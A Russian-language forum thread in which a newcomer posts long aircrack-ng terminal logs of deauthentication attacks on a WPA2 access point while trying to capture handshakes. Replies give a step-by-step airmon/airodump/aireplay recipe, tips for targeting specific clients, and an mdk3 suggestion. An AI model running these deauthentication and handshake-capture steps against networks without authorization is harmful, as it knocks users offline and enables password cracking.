Можно и с кувалдой прийти разбить поутер, по вашему это тоже Ddos атака, и вообще хоты бы разобрались с чем имеете дело. aircrack-ng
Тебе же бабло не жмет, что вы нам говорите, о каком то порядку в 50 к????? Режим pci слота на подбор не влияет...
Уважаемые форумчане! Ни как не могу поймать хендшейки,я новичок, подскажите что не так делаю. Заранее спс. Code: root@neo:~# iwconfig eth0 no wireless extensions. wlan0 IEEE 802.11bgn ESSID:eek:ff/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff Encryption key:eek:ff Power Management:eek:ff lo no wireless extensions. wlan1 IEEE 802.11bgn ESSID:eek:ff/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff Encryption key:eek:ff Power Management:eek:ff root@neo:~# airmon-ng check kill Killing these processes: PID Name 819 wpa_supplicant root@neo:~# iwconfig eth0 no wireless extensions. wlan0 IEEE 802.11bgn ESSID:eek:ff/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff Encryption key:eek:ff Power Management:eek:ff lo no wireless extensions. wlan1 IEEE 802.11bgn ESSID:eek:ff/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff Encryption key:eek:ff Power Management:eek:ff root@neo:~# airmon-ng start wlan1 No interfering processes found PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01) phy1 wlan1 rtl8192cu (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon) (mac80211 station mode vif disabled for [phy1]wlan1) root@neo:~# airmon-ng start mon No interfering processes found PHY Interface Driver Chipset phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01) phy1 wlan1mon rtl8192cu root@neo:~# iwconfig wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr=2347 B Fragment thr:eek:ff Power Management:eek:n eth0 no wireless extensions. wlan0 IEEE 802.11bgn ESSID:eek:ff/any Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm Retry short limit:7 RTS thr:eek:ff Fragment thr:eek:ff Encryption key:eek:ff Power Management:eek:ff lo no wireless extensions. root@neo:~# airodump-ng mon Interface mon: ioctl(SIOCGIFINDEX) failed: No such device root@neo:~# airodump-ng wlan1mon CH 9 ][ Elapsed: 18 mins ][ 2015-11-05 19:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 84:C9:B2:CB:84:D2 -22 5040 9300 0 6 54e WPA2 CCMP PSK DSL_2640NRU BSSID STATION PWR Rate Lost Frames Probe 84:C9:B2:CB:84:D2 6C:5F:1C:BE:E3:B7 -30 0e- 0e 326 9352 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:43:32 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:43:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:44:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11 19:44:22 wlan1mon is on channel 11, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:44:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 11 19:44:33 wlan1mon is on channel 11, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:44:37 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:44:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:44 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:44:46 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:48:10 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10 19:48:10 wlan1mon is on channel 10, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:48:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:25 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:48:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:49:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 8 19:49:18 wlan1mon is on channel 8, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:49:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3 19:49:22 wlan1mon is on channel 3, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:49:26 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 4 19:49:26 wlan1mon is on channel 4, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:49:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:49:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:49:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:50:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 1 19:50:19 wlan1mon is on channel 1, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon 19:51:12 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11 19:51:22 No such BSSID available. Please specify an ESSID (-e). root@neo:~# root@neo:~# root@neo:~# root@neo:~# root@neo:~# root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon 19:51:28 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6 19:51:38 No such BSSID available. Please specify an ESSID (-e). root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon 19:52:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:24 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:52:31 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:39 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:44 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:52:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:52:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:53:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 2 ACKs] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon 19:53:16 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:53:17 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:53:34 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs] 19:53:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:48 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:53:50 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:55 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs] 19:53:58 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:54:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs] ^C root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:54:19 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11 19:54:29 No such BSSID available. Please specify an ESSID (-e). root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:54:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:54:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:55:30 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:55:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:56:07 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 5 19:56:08 wlan1mon is on channel 5, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:56:17 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:56:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:56:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1 Interface wlan1: ioctl(SIOCGIFINDEX) failed: No such device root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon 19:56:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10 19:56:51 wlan1mon is on channel 10, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:57:02 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6 19:57:12 No such BSSID available. Please specify an ESSID (-e). root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:57:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3 19:57:23 wlan1mon is on channel 3, but the AP uses channel 6 root@neo:~# root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:57:25 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 2 19:57:26 wlan1mon is on channel 2, but the AP uses channel 6 root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon 19:57:28 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 19:57:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one "aireplay-ng --help" for help. root@neo:~# aireplay-ng mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one "aireplay-ng --help" for help. root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:12:15 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:13:05 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:13:05 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:08 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:09 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:10 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:11 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:12 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:13:48 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:13:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:17:12 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:17:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:17:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:36 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:17:41 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one 20:26:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:26:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:26:58 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:00 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon20:27:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6 NB: this attack is more effective when targeting a connected wireless client (-c <client's mac>). 20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] 20:27:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2] root@neo:~#
Взял что было под рукой samsung 7262 ни разу на него не снимал, на камере флешка забита, ну вроде смысл то понятен.
root@neo:~#airmon-ng root@neo:~#airmon-ng start wlan(x) root@neo:~#ifconfig ....................-смотришь свой адапте в режиме монитора root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) mon(x) ................................. -w - записывает хеш write, -с - канал root@neo:~#новый терминал root@neo:~#aireplay-ng -0 xxx -a xx:xx:xx:xx:xx mon(xxx) ........................-0 - и есть -- деавторизация --deauth, xxx - кол-во пакетов.
В Windows этого никак не сделать, пока что. Windows очень многое ограничивает, в плане аппаратного доступа.
Нужен свисток для тарелки от параболы 90 см. Линк держал как можно дальше! Просьба самодельные и дорогие не предлагать! Нужны готовые решение, в али их много но которую???
Утро доброе форумчане! Ранее уже писал что не могу поймать хейндшеки. Установлен kali linux 2.0 Адаптер tp link 8200 nd root@neo:~#airmon-ng root@neo:~#iwconfig root@neo:~#ifconfig wlan1 down root@neo:~#iwconfig wlan1 mode monitor root@neo:~#ifconfig wlan1 up root@neo:~#airodump-ng -w xxx (название хэша) --bssid xx:xx:xx:xx:xx -c (x) wlan1 root@neo:~#новый терминал root@neo:~#aireplay-ng -0 10 -a xx:xx:xx:xx:xx wlan1 Файл под названием сохраняется,но в окне WPA хендшейк не появляется. Отключить клиента от точки также на получается, проверяю на своем роутере(подкл. телефон на андройде) уже в тупике,заранее спасибо.
пробуй отправлять другое кол-во деаутентификационных пакетов aireplay-ng -0 100 -a xx:xx:xx:xx:xx wlan1 - например 100, можно больше... конкретизируй клиента сети aireplay-ng -0 100 -a xx:xx:xx:xx:xx -с yy:yy:yy:yy:yy:yy wlan1
Укажи конкретного клиента и сразу заметишь разницу! Ну и для начала, конечно, потренеруйся на... Spoiler
Если честно, мне кажется, что mdk3 будет поэффективнее и не требует много движений для простой деаутентификации
